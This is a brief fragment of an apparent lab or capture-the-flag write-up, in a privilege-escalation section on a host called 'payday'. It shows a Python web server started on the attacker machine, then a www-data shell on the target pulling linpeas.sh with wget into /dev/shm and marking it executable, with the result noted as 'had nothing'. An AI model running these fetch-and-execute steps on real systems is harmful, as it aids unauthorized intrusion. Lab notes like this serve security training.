Priv Esc

$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
www-data@payday:/dev/shm$ wget 192.168.45.233/linpeas.sh
--21:40:03--  http://192.168.45.233/linpeas.sh
           => `linpeas.sh'
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860,335 (840K) [text/x-sh]

100%[====================================>] 860,335      563.87K/s             

21:40:04 (562.51 KB/s) - `linpeas.sh' saved [860335/860335]

www-data@payday:/dev/shm$ chmod +x linpeas.sh

Had nothing

Last updated